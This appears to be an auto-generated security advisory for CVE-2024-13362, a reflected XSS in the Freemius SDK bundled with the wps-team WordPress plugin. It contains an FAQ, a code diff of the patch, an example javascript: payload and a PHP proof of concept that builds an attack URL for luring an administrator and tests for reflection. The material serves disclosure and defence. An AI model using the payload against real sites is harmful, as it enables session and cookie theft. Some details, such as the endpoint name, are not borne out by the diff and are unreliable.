What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability in the Freemius SDK, affecting versions <= 2.10.1. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via a malicious URL parameter.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization in the Freemius SDK’s handling of the url parameter. An attacker can craft a URL containing a malicious JavaScript payload, which executes when a user clicks the link and visits the affected admin page.

Who is affected by this vulnerability?

Any WordPress site using the Freemius SDK version 2.10.1 or earlier is at risk. Administrators can check their plugin versions and update to the patched version to mitigate the risk.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the Freemius SDK in use. If it is 2.10.1 or earlier, your site is at risk and should be updated to version 2.11.0 or later.

How can I fix the vulnerability?

The vulnerability can be fixed by updating the Freemius SDK to version 2.11.0 or later. Ensure that all plugins and themes using this SDK are updated to their latest versions.

What does the CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk, especially to sites with administrative access.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, cookie theft, and unauthorized actions performed in the context of the logged-in user’s session. This could compromise the security of the WordPress admin area.

What is a proof of concept (PoC)?

A proof of concept (PoC) is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how a crafted URL can execute JavaScript in the context of the WordPress admin dashboard.

How does the PoC demonstrate the issue?

The PoC constructs a malicious URL that includes a JavaScript payload. When this URL is accessed by an administrator, it shows how the injected script can execute, confirming the vulnerability’s existence.

What additional security measures should I consider?

In addition to updating the affected SDK, consider implementing web application firewalls, regular security audits, and user training to avoid falling victim to phishing attempts that exploit such vulnerabilities.

Is this vulnerability specific to certain plugins?

Yes, this vulnerability specifically affects WordPress plugins and themes that utilize the Freemius SDK version 2.10.1 or earlier. It is important to identify all plugins that may be using this SDK.

What should I do if I cannot update immediately?

If immediate updates are not possible, consider disabling the affected plugins or restricting access to the admin area until the vulnerability can be patched. Monitor your site for any suspicious activity.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 6, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (wps-team)

Q: How does the vulnerability work?

The vulnerability arises from insufficient input sanitization in the Freemius SDK’s handling of the url parameter. An attacker can craft a URL containing a malicious JavaScript payload, which executes when a user clicks the link and visits the affected admin page.

Q: Who is affected by this vulnerability?

Any WordPress site using the Freemius SDK version 2.10.1 or earlier is at risk. Administrators can check their plugin versions and update to the patched version to mitigate the risk.

Q: How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the Freemius SDK in use. If it is 2.10.1 or earlier, your site is at risk and should be updated to version 2.11.0 or later.

Q: How can I fix the vulnerability?

The vulnerability can be fixed by updating the Freemius SDK to version 2.11.0 or later. Ensure that all plugins and themes using this SDK are updated to their latest versions.

Q: What does the CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk, especially to sites with administrative access.

Q: What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, cookie theft, and unauthorized actions performed in the context of the logged-in user’s session. This could compromise the security of the WordPress admin area.

Q: What is a proof of concept (PoC)?

A proof of concept (PoC) is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how a crafted URL can execute JavaScript in the context of the WordPress admin dashboard.

Q: How does the PoC demonstrate the issue?

The PoC constructs a malicious URL that includes a JavaScript payload. When this URL is accessed by an administrator, it shows how the injected script can execute, confirming the vulnerability’s existence.

Q: What additional security measures should I consider?

In addition to updating the affected SDK, consider implementing web application firewalls, regular security audits, and user training to avoid falling victim to phishing attempts that exploit such vulnerabilities.

CVE ID CVE-2024-13362

Plugin wps-team

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 3.3.0

Patched Version 3.3.2

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362: This is a reflected DOM-based cross-site scripting (XSS) vulnerability in the Freemius SDK (versions <= 2.10.1) used by multiple WordPress plugins and themes. An unauthenticated attacker can inject arbitrary JavaScript into a page by tricking a user into clicking a crafted link containing a malicious url parameter. The CVSS score is 6.1 (Medium).

The root cause is insufficient input sanitization in the Freemius SDK's handling of the url parameter. The vulnerable code resides in the Freemius SDK's class-freemius.php file, specifically in the trial_promotion_message filter and the admin notice rendering logic. The url parameter is passed directly into an anchor tag's href attribute without proper escaping or validation. The Freemius SDK version bundled with the plugin was updated from 2.10.1 to 2.11.0 in this patch.

To exploit this vulnerability, an attacker crafts a URL containing a malicious JavaScript payload in the url parameter. The attacker then lures a logged-in WordPress administrator (or any user with access to the WordPress admin area) into clicking this link. When the victim's browser renders the admin page that displays the Freemius trial promotion message, the injected JavaScript executes in the context of the WordPress admin dashboard. Example payload: /wp-admin/admin.php?page=freemius-trial&url=javascript:alert(document.cookie).

The patch addresses the vulnerability by restructuring the HTML output in the Freemius SDK's admin notice rendering. Instead of directly concatenating the url parameter into an anchor tag, the patched version wraps the button in a container div and applies the plugin's own filter to the message content. This prevents direct injection of unescaped URL parameters into HTML attributes. The patch also includes numerous other security hardening changes, such as adding ABSPATH checks, improving data sanitization, and updating version numbers.

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the WordPress admin dashboard. This can lead to session hijacking, cookie theft, cross-site request forgery (CSRF) attacks, defacement, and potential privilege escalation if the injected script performs administrative actions on behalf of the victim user.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wps-team/freemius.php
+++ b/wps-team/freemius.php
@@ -2,6 +2,9 @@

 namespace WPSpeedo_Team;

+if ( !defined( 'ABSPATH' ) ) {
+    exit;
+}
 if ( !function_exists( 'wps_team_fs' ) ) {
     // Create a helper function for easy SDK access.
     function wps_team_fs() {
--- a/wps-team/includes/data.php
+++ b/wps-team/includes/data.php
@@ -18,6 +18,14 @@
          * Register Custom Taxonomies
          */
         add_action( 'init', array($this, 'register_taxonomies'), 0 );
+        // Update First Name & Last Name from Quick Edit
+        $post_type = Utils::post_type_name();
+        add_action(
+            "edit_post_{$post_type}",
+            array($this, 'save_name_fields_quick_edit'),
+            10,
+            2
+        );
         /*
          * Register Custom Metaboxes
          */
@@ -40,6 +48,13 @@
     }

     /*
+     * Add order column to Taxonomies
+     */
+    public function save_name_fields_quick_edit( $post_id, $post ) {
+        Utils::update_name_fields_from_title( $post_id, $post->post_title );
+    }
+
+    /*
      * Post type columns style
      */
     public function add_columns_style() {
@@ -245,6 +260,11 @@
             $meta_data = json_decode( stripslashes( $_POST['_wps_member_meta_data'] ), true );
             $meta_data = $this->get_validated_meta_data( $post_id, $meta_data );
             // Sanitization & Validation Done
+            // First Name & Last Name
+            if ( array_key_exists( '_first_name', $_POST ) && array_key_exists( '_last_name', $_POST ) ) {
+                $meta_data['_first_name'] = sanitize_text_field( $_POST['_first_name'] );
+                $meta_data['_last_name'] = sanitize_text_field( $_POST['_last_name'] );
+            }
             foreach ( $meta_data as $meta_key => $meta_value ) {
                 update_post_meta( $post_id, $meta_key, $meta_value );
                 Utils::update_all_posts_meta_vals();
--- a/wps-team/includes/editor/meta-box-editor.php
+++ b/wps-team/includes/editor/meta-box-editor.php
@@ -9,6 +9,41 @@
     public function __construct( array $data = [], array $args = null ) {
         parent::__construct( $data, $args );
         do_action( 'wpspeedo_team/metabox_editor/init', $this );
+        add_action( 'edit_form_before_permalink', [$this, 'add_name_fields'] );
+    }
+
+    public function add_name_fields() {
+        $_first_name = get_post_meta( get_the_ID(), '_first_name', true );
+        $_last_name = get_post_meta( get_the_ID(), '_last_name', true );
+        ?>
+
+		<div class="wps-team--member-name-fields">
+
+			<div class="wps-team--member-first-name">
+				<label for="wps_member_first_name">
+					<?php
+        echo plugin()->translations->get( 'first_name_label', _x( 'First Name', 'Admin Metabox', 'wpspeedo-team' ) );
+        ?>
+				</label>
+				<input type="text" name="_first_name" size="30" value="<?php
+        echo esc_attr( $_first_name );
+        ?>" id="wps_member_first_name" autocomplete="off">
+			</div>
+
+			<div class="wps-team--member-last-name">
+				<label for="wps_member_last_name">
+					<?php
+        echo plugin()->translations->get( 'last_name_label', _x( 'Last Name', 'Admin Metabox', 'wpspeedo-team' ) );
+        ?>
+				</label>
+				<input type="text" name="_last_name" size="30" value="<?php
+        echo esc_attr( $_last_name );
+        ?>" id="wps_member_last_name" autocomplete="off">
+			</div>
+
+		</div>
+
+		<?php
     }

     public function get_name() {
--- a/wps-team/includes/editor/settings-editor.php
+++ b/wps-team/includes/editor/settings-editor.php
@@ -601,7 +601,7 @@
             'type'        => Controls_Manager::HEADING,
         ] );
         $this->add_control( 'title_color', [
-            'label'       => _x( 'Title Color', 'Settings: Single Page', 'wpspeedo-team' ),
+            'label'       => _x( 'Name Color', 'Settings: Single Page', 'wpspeedo-team' ),
             'label_block' => false,
             'type'        => Controls_Manager::COLOR,
             'separator'   => 'after',
--- a/wps-team/includes/editor/shortcode-editor.php
+++ b/wps-team/includes/editor/shortcode-editor.php
@@ -354,13 +354,13 @@
             'tab'   => 'style',
         ] );
         $this->add_control( 'title_color', [
-            'label'       => _x( 'Title Color', 'Editor', 'wpspeedo-team' ),
+            'label'       => _x( 'Name Color', 'Editor', 'wpspeedo-team' ),
             'label_block' => false,
             'type'        => Controls_Manager::COLOR,
             'separator'   => 'after',
         ] );
         $this->add_control( 'title_color_hover', [
-            'label'       => _x( 'Title Color Hover', 'Editor', 'wpspeedo-team' ),
+            'label'       => _x( 'Name Color Hover', 'Editor', 'wpspeedo-team' ),
             'label_block' => false,
             'type'        => Controls_Manager::COLOR,
         ] );
@@ -409,6 +409,16 @@
             'label_block' => false,
             'type'        => Controls_Manager::COLOR,
         ] );
+        $this->add_control( 'read_more_text_color', [
+            'label'       => _x( 'Read More Color', 'Editor', 'wpspeedo-team' ),
+            'label_block' => false,
+            'type'        => Controls_Manager::COLOR,
+        ] );
+        $this->add_control( 'read_more_text_hover_color', [
+            'label'       => _x( 'Read More Hover Color', 'Editor', 'wpspeedo-team' ),
+            'label_block' => false,
+            'type'        => Controls_Manager::COLOR,
+        ] );
         $this->end_controls_section();
     }

--- a/wps-team/includes/freemius/includes/class-freemius.php
+++ b/wps-team/includes/freemius/includes/class-freemius.php
@@ -24000,13 +24000,15 @@

             // Start trial button.
             $button = ' ' . sprintf(
-                    '<a style="margin-left: 10px; vertical-align: super;" href="%s"><button class="button button-primary">%s  ➜</button></a>',
+                    '<div><a class="button button-primary" href="%s">%s  ➜</a></div>',
                     $trial_url,
                     $this->get_text_x_inline( 'Start free trial', 'call to action', 'start-free-trial' )
                 );

+            $message_text = $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string}" );
+
             $this->_admin_notices->add_sticky(
-                $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string} {$button}" ),
+                "<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>",
                 'trial_promotion',
                 '',
                 'promotion'
@@ -25476,7 +25478,7 @@
                 $img_dir = WP_FS__DIR_IMG;

                 // Locate the main assets folder.
-                if ( 1 < count( $fs_active_plugins->plugins ) ) {
+                if ( ! empty( $fs_active_plugins->plugins ) ) {
                     $plugin_or_theme_img_dir = ( $this->is_plugin() ? WP_PLUGIN_DIR : get_theme_root( get_stylesheet() ) );

                     foreach ( $fs_active_plugins->plugins as $sdk_path => &$data ) {
--- a/wps-team/includes/freemius/includes/class-fs-plugin-updater.php
+++ b/wps-team/includes/freemius/includes/class-fs-plugin-updater.php
@@ -542,24 +542,8 @@

             global $wp_current_filter;

-            $current_plugin_version = $this->_fs->get_plugin_version();
-
-            if ( ! empty( $wp_current_filter ) && 'upgrader_process_complete' === $wp_current_filter[0] ) {
-                if (
-                    is_null( $this->_update_details ) ||
-                    ( is_object( $this->_update_details ) && $this->_update_details->new_version !== $current_plugin_version )
-                ) {
-                    /**
-                     * After an update, clear the stored update details and reparse the plugin's main file in order to get
-                     * the updated version's information and prevent the previous update information from showing up on the
-                     * updates page.
-                     *
-                     * @author Leo Fajardo (@leorw)
-                     * @since 2.3.1
-                     */
-                    $this->_update_details  = null;
-                    $current_plugin_version = $this->_fs->get_plugin_version( true );
-                }
+            if ( ! empty( $wp_current_filter ) && in_array( 'upgrader_process_complete', $wp_current_filter ) ) {
+                return $transient_data;
             }

             if ( ! isset( $this->_update_details ) ) {
@@ -568,7 +552,7 @@
                     false,
                     fs_request_get_bool( 'force-check' ),
                     FS_Plugin_Updater::UPDATES_CHECK_CACHE_EXPIRATION,
-                    $current_plugin_version
+                    $this->_fs->get_plugin_version()
                 );

                 $this->_update_details = false;
--- a/wps-team/includes/freemius/includes/entities/class-fs-plugin-plan.php
+++ b/wps-team/includes/freemius/includes/entities/class-fs-plugin-plan.php
@@ -13,7 +13,6 @@
 	/**
 	 * Class FS_Plugin_Plan
 	 *
-	 * @property FS_Pricing[] $pricing
 	 */
 	class FS_Plugin_Plan extends FS_Entity {

--- a/wps-team/includes/freemius/includes/entities/class-fs-site.php
+++ b/wps-team/includes/freemius/includes/entities/class-fs-site.php
@@ -10,16 +10,16 @@
         exit;
     }

-    /**
-     * @property int $blog_id
-     */
-    #[AllowDynamicProperties]
     class FS_Site extends FS_Scope_Entity {
         /**
          * @var number
          */
         public $site_id;
         /**
+         * @var int
+         */
+        public $blog_id;
+        /**
          * @var number
          */
         public $plugin_id;
--- a/wps-team/includes/freemius/includes/entities/class-fs-user.php
+++ b/wps-team/includes/freemius/includes/entities/class-fs-user.php
@@ -48,6 +48,19 @@
 			parent::__construct( $user );
 		}

+		/**
+		 * This method removes the deprecated 'is_beta' property from the serialized data.
+		 * Should clean up the serialized data to avoid PHP 8.2 warning on next execution.
+		 *
+		 * @return void
+		 */
+		function __wakeup() {
+			if ( property_exists( $this, 'is_beta' ) ) {
+				// If we enter here, and we are running PHP 8.2, we already had the warning. But we sanitize data for next execution.
+				unset( $this->is_beta );
+			}
+		}
+
 		function get_name() {
 			return trim( ucfirst( trim( is_string( $this->first ) ? $this->first : '' ) ) . ' ' . ucfirst( trim( is_string( $this->last ) ? $this->last : '' ) ) );
 		}
--- a/wps-team/includes/freemius/includes/managers/class-fs-admin-menu-manager.php
+++ b/wps-team/includes/freemius/includes/managers/class-fs-admin-menu-manager.php
@@ -699,16 +699,36 @@
 				$menu = $this->find_main_submenu();
 			}

+			$menu_slug   = $menu['menu'][2];
 			$parent_slug = isset( $menu['parent_slug'] ) ?
-                $menu['parent_slug'] :
-                'admin.php';
+				$menu['parent_slug'] :
+				'admin.php';

-            return admin_url(
-                $parent_slug .
-                ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
-                'page=' .
-                $menu['menu'][2]
-            );
+			if ( fs_apply_filter( $this->_module_unique_affix, 'enable_cpt_advanced_menu_logic', false ) ) {
+				$parent_slug = 'admin.php';
+
+				/**
+				 * This line and the `if` block below it are based on the `menu_page_url()` function of WordPress.
+				 *
+				 * @author Leo Fajardo (@leorw)
+				 * @since 2.10.2
+				 */
+				global $_parent_pages;
+
+				if ( ! empty( $_parent_pages[ $menu_slug ] ) ) {
+					$_parent_slug = $_parent_pages[ $menu_slug ];
+					$parent_slug  = isset( $_parent_pages[ $_parent_slug ] ) ?
+						$parent_slug :
+						$menu['parent_slug'];
+				}
+			}
+
+			return admin_url(
+				$parent_slug .
+				( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
+				'page=' .
+				$menu_slug
+			);
 		}

 		/**
--- a/wps-team/includes/freemius/includes/managers/class-fs-admin-notice-manager.php
+++ b/wps-team/includes/freemius/includes/managers/class-fs-admin-notice-manager.php
@@ -194,8 +194,14 @@
          * @since  1.0.7
          */
         static function _add_sticky_dismiss_javascript() {
+            $sticky_admin_notice_js_template_name = 'sticky-admin-notice-js.php';
+
+            if ( ! file_exists( fs_get_template_path( $sticky_admin_notice_js_template_name ) ) ) {
+                return;
+            }
+
             $params = array();
-            fs_require_once_template( 'sticky-admin-notice-js.php', $params );
+            fs_require_once_template( $sticky_admin_notice_js_template_name, $params );
         }

         private static $_added_sticky_javascript = false;
--- a/wps-team/includes/freemius/start.php
+++ b/wps-team/includes/freemius/start.php
@@ -15,7 +15,7 @@
 	 *
 	 * @var string
 	 */
-	$this_sdk_version = '2.10.1';
+	$this_sdk_version = '2.11.0';

 	#region SDK Selection Logic --------------------------------------------------------------------

--- a/wps-team/includes/managers/bulk-import-manager.php
+++ b/wps-team/includes/managers/bulk-import-manager.php
@@ -28,7 +28,7 @@

         set_transient( 'wps_team_csv_rows', $rows, DAY_IN_SECONDS );

-        $allowed = array( 'name', 'designation', 'email', 'company' );
+        $allowed = array( 'first_name', 'last_name', 'designation', 'email', 'company' );

         $rows = array_map(function( $row ) use ($allowed) {
             return array_intersect_key( $row, array_flip($allowed) );
@@ -48,10 +48,10 @@

         $row = $this->map_row_data( $rows[$index] );

-        if ( empty($row['name']) ) wp_send_json_error( _x( 'Row name not found', 'Bulk Import', 'wpspeedo-team' ), 400 );
+        if ( empty($row['first_name']) || empty($row['last_name']) ) wp_send_json_error( _x( 'Row name not found', 'Bulk Import', 'wpspeedo-team' ), 400 );

         $item = [
-            'post_title'    => $row['name'],
+            'post_title'    => Utils::get_title_from_name_fields( $row['first_name'], $row['last_name'] ),
             'post_content'  => empty($row['description']) ? '' : $row['description'],
             'post_status'   => 'publish',
             'post_type'     => Utils::post_type_name(),
@@ -170,22 +170,25 @@

         $meta_input = [];

-        if ( !empty($row['experience']) )   $meta_input['_experience']      = sanitize_text_field( $row['experience'] );
-        if ( !empty($row['company']) )      $meta_input['_company']         = sanitize_text_field( $row['company'] );
+        if ( !empty($row['first_name']) )   $meta_input['_first_name']      = sanitize_text_field( $row['first_name'] );
+        if ( !empty($row['last_name']) )    $meta_input['_last_name']       = sanitize_text_field( $row['last_name'] );
         if ( !empty($row['designation']) )  $meta_input['_designation']     = sanitize_text_field( $row['designation'] );
-        if ( !empty($row['telephone']) )    $meta_input['_telephone']       = sanitize_text_field( $row['telephone'] );
         if ( !empty($row['email']) )        $meta_input['_email']           = sanitize_email( $row['email'] );
+        if ( !empty($row['mobile']) )       $meta_input['_mobile']          = sanitize_text_field( $row['mobile'] );
+        if ( !empty($row['telephone']) )    $meta_input['_telephone']       = sanitize_text_field( $row['telephone'] );
+        if ( !empty($row['experience']) )   $meta_input['_experience']      = sanitize_text_field( $row['experience'] );
         if ( !empty($row['website']) )      $meta_input['_website']         = esc_url_raw( $row['website'] );
+        if ( !empty($row['company']) )      $meta_input['_company']         = sanitize_text_field( $row['company'] );
+        if ( !empty($row['address']) )      $meta_input['_address']         = sanitize_text_field( $row['address'] );
         if ( !empty($row['ribbon']) )       $meta_input['_ribbon']          = sanitize_text_field( $row['ribbon'] );
-        if ( !empty($row['mobile']) )       $meta_input['_mobile']          = sanitize_text_field( $row['mobile'] );
-        if ( !empty($row['color']) )        $meta_input['_color']           = sanitize_text_field( $row['color'] );
-        if ( !empty($row['education']) )    $meta_input['_education']       = wp_kses_post( $row['education'] );
         if ( !empty($row['link_one']) )     $meta_input['_link_1']          = esc_url_raw( $row['link_one'] );
         if ( !empty($row['link_two']) )     $meta_input['_link_2']          = esc_url_raw( $row['link_two'] );
-        if ( !empty($row['skills']) )       $meta_input['_skills']          = (array) $row['skills'];
-        if ( !empty($row['social_links']) ) $meta_input['_social_links']    = (array) $row['social_links'];
+        if ( !empty($row['color']) )        $meta_input['_color']           = sanitize_text_field( $row['color'] );
+        if ( !empty($row['education']) )    $meta_input['_education']       = wp_kses_post( $row['education'] );
         if ( !empty($row['thumbnail']) )    $meta_input['_thumbnail_id']    = (int) $this->get_thumbnail_id( $row['thumbnail'] );
         if ( !empty($row['gallery']) )      $meta_input['_gallery']         = (array) $this->get_gallery_ids( $row['gallery'] );
+        if ( !empty($row['social_links']) ) $meta_input['_social_links']    = (array) $row['social_links'];
+        if ( !empty($row['skills']) )       $meta_input['_skills']          = (array) $row['skills'];

         $meta_input['_wps_member_meta_keys'] = Utils::get_meta_field_keys();

@@ -211,12 +214,12 @@

             $header_row = array_map( [ $this, 'sanitize_header_row' ], $header_row );

-            if ( count($header_row) !== 28 ) return new WP_Error('invalid_file', _x('Invalid File Content', 'Bulk Import', 'wpspeedo-team') );
+            if ( count($header_row) !== 30 ) return new WP_Error('invalid_file', _x('Invalid File Content', 'Bulk Import', 'wpspeedo-team') );

             // Read file
             while ( ( $csv_data = fgetcsv($csv_file) ) !== false ) {

-                if ( count($csv_data) !== 28 ) return new WP_Error('invalid_file', _x('Invalid File Content', 'Bulk Import', 'wpspeedo-team') );
+                if ( count($csv_data) !== 30 ) return new WP_Error('invalid_file', _x('Invalid File Content', 'Bulk Import', 'wpspeedo-team') );

                 $csv_data = array_map( function( $column ) {
                     return _wp_json_convert_string( trim($column) );
--- a/wps-team/includes/upgrader.php
+++ b/wps-team/includes/upgrader.php
@@ -26,7 +26,7 @@
     }

     public function upgrade_paths() {
-        return [ '2.4.0', '2.5.7', '2.5.8', '2.7.0', '3.1.0', '3.2.1' ];
+        return [ '2.4.0', '2.5.7', '2.5.8', '2.7.0', '3.1.0', '3.2.1', '3.3.1' ];
     }

     public function run() {
@@ -345,5 +345,20 @@
         }

     }
+
+    public function _v_3_3_1() {
+
+        $team_members = get_posts([
+            'fields'         => 'ids',
+            'post_type'      => Utils::post_type_name(),
+            'posts_per_page' => -1,
+            'post_status'    => 'any',
+        ]);
+
+        foreach ( $team_members as $team_member_id ) {
+            Utils::update_name_fields_from_title( $team_member_id, get_the_title( $team_member_id ) );
+        }
+
+    }

 }
 No newline at end of file
--- a/wps-team/includes/utils.php
+++ b/wps-team/includes/utils.php
@@ -289,6 +289,8 @@

     public static function default_settings() {
         return [
+            'first_name_label'             => 'First Name',
+            'last_name_label'              => 'Last Name',
             'desig_label'                  => 'Designation',
             'email_label'                  => 'Email Address',
             'mobile_label'                 => 'Mobile (Personal)',
@@ -1011,10 +1013,14 @@
                 'value' => 'ID',
             ],
             [
-                'label' => _x( 'Name', 'Editor', 'wpspeedo-team' ),
+                'label' => _x( 'First Name', 'Editor', 'wpspeedo-team' ),
                 'value' => 'title',
             ],
             [
+                'label' => _x( 'Last Name', 'Editor', 'wpspeedo-team' ),
+                'value' => 'last_name',
+            ],
+            [
                 'label' => _x( 'Date', 'Editor', 'wpspeedo-team' ),
                 'value' => 'date',
             ],
@@ -1640,8 +1646,8 @@
         if ( $length == null ) {
             $length = self::shortcode_loader()->get_setting( 'description_length' );
         }
-        if ( $length == 0 ) {
-            $length = PHP_INT_MAX - 500;
+        if ( !$length || $length < 1 ) {
+            return PHP_INT_MAX - 500;
         }
         return $length;
     }
@@ -1669,6 +1675,7 @@
             }
             if ( $action !== 'none' ) {
                 $attrs = self::get_post_link_attrs( $post_id, self::shortcode_loader()->id, $action );
+                $attrs['class'] = 'wps-team--read-more-link ' . $attrs['class'];
                 $read_more_link = sprintf(
                     '<a href="%s" class="%s" %s %s>%s</a>',
                     esc_attr( $attrs['href'] ),
@@ -1706,6 +1713,7 @@
             }
             if ( $action !== 'none' ) {
                 $attrs = self::get_post_link_attrs_template( self::shortcode_loader()->id, $action );
+                $attrs['class'] = 'wps-team--read-more-link ' . $attrs['class'];
                 $read_more_link = sprintf(
                     '<a href="%s" class="%s" %s %s>%s</a>',
                     esc_attr( $attrs['href'] ),
@@ -2435,4 +2443,29 @@
         return @rmdir( $dir );
     }

+    public static function get_title_from_name_fields( $first_name = '', $last_name = '' ) {
+        return trim( $first_name . ' ' . $last_name );
+    }
+
+    public static function update_name_fields_from_title( $post_id, $post_title ) {
+        $name_parts = explode( ' ', $post_title );
+        $first_name = '';
+        $last_name = '';
+        // Generate the name parts
+        if ( count( $name_parts ) === 1 ) {
+            $first_name = $name_parts[0];
+        } else {
+            $first_name = array_shift( $name_parts );
+            $last_name = implode( ' ', $name_parts );
+        }
+        // Update the First Name
+        if ( !empty( $first_name ) ) {
+            update_post_meta( $post_id, '_first_name', $first_name );
+        }
+        // Update the Last Name
+        if ( !empty( $last_name ) ) {
+            update_post_meta( $post_id, '_last_name', $last_name );
+        }
+    }
+
 }
--- a/wps-team/wps-team.php
+++ b/wps-team/wps-team.php
@@ -7,14 +7,14 @@
  * Plugin URI: https://wpspeedo.com/wps-team-pro?utm_source=wp-plugins&utm_campaign=plugin-uri&utm_medium=wp-dash
  * Author: WPSpeedo
  * Author URI: https://wpspeedo.com?utm_source=wp-plugins&utm_campaign=author-uri&utm_medium=wp-dash
- * Version: 3.3.0
+ * Version: 3.3.2
  * Domain Path: /languages
  * Text Domain: wpspeedo-team
   */

 if ( ! defined( 'ABSPATH' ) ) exit;

-define( 'WPS_TEAM_VERSION', '3.3.0' );
+define( 'WPS_TEAM_VERSION', '3.3.2' );

 define( 'WPS_TEAM_FILE', __FILE__ );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC demonstrates the reflected XSS in Freemius SDK versions <= 2.10.1
// Set the target WordPress URL below (must have a plugin/theme using Freemius with vulnerable SDK)

$target_url = 'http://example.com/wp-admin/admin.php?page=freemius-trial';
$payload = 'javascript:alert(document.domain)';

// Build the malicious URL
$attack_url = $target_url . '&url=' . urlencode($payload);

echo "[+] Atomic Edge CVE-2024-13362 Proof of Conceptn";
echo "[+] Target: " . $target_url . "n";
echo "[+] Payload: " . $payload . "n";
echo "[+] Attack URL (send this to admin user):n";
echo $attack_url . "nn";

// Send a test request to verify the parameter is reflected
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_xxx=test'); // dummy cookie for demo
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Response Code: " . $http_code . "n";
if (strpos($response, $payload) !== false) {
    echo "[!] VULNERABLE: Payload reflected in response!n";
} else {
    echo "[-] Not vulnerable or patch applied.n";
}

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability in the Freemius SDK, affecting versions <= 2.10.1. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via a malicious URL parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization in the Freemius SDK’s handling of the url parameter. An attacker can craft a URL containing a malicious JavaScript payload, which executes when a user clicks the link and visits the affected admin page.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Freemius SDK version 2.10.1 or earlier is at risk. Administrators can check their plugin versions and update to the patched version to mitigate the risk.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the version of the Freemius SDK in use. If it is 2.10.1 or earlier, your site is at risk and should be updated to version 2.11.0 or later.
How can I fix the vulnerability?
Updating the affected plugin
The vulnerability can be fixed by updating the Freemius SDK to version 2.11.0 or later. Ensure that all plugins and themes using this SDK are updated to their latest versions.
What does the CVSS score of 6.1 mean?
Understanding the severity rating
A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk, especially to sites with administrative access.
What are the practical risks of this vulnerability?
Potential impacts on security
Exploitation of this vulnerability can lead to session hijacking, cookie theft, and unauthorized actions performed in the context of the logged-in user’s session. This could compromise the security of the WordPress admin area.
What is a proof of concept (PoC)?
Demonstrating the vulnerability
A proof of concept (PoC) is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how a crafted URL can execute JavaScript in the context of the WordPress admin dashboard.
How does the PoC demonstrate the issue?
Details of the demonstration
The PoC constructs a malicious URL that includes a JavaScript payload. When this URL is accessed by an administrator, it shows how the injected script can execute, confirming the vulnerability’s existence.
What additional security measures should I consider?
Beyond patching the vulnerability
In addition to updating the affected SDK, consider implementing web application firewalls, regular security audits, and user training to avoid falling victim to phishing attempts that exploit such vulnerabilities.
Is this vulnerability specific to certain plugins?
Scope of affected software
Yes, this vulnerability specifically affects WordPress plugins and themes that utilize the Freemius SDK version 2.10.1 or earlier. It is important to identify all plugins that may be using this SDK.
What should I do if I cannot update immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the affected plugins or restricting access to the admin area until the vulnerability can be patched. Monitor your site for any suspicious activity.

How Atomic Edge Works

Simple Setup. Powerful Security.

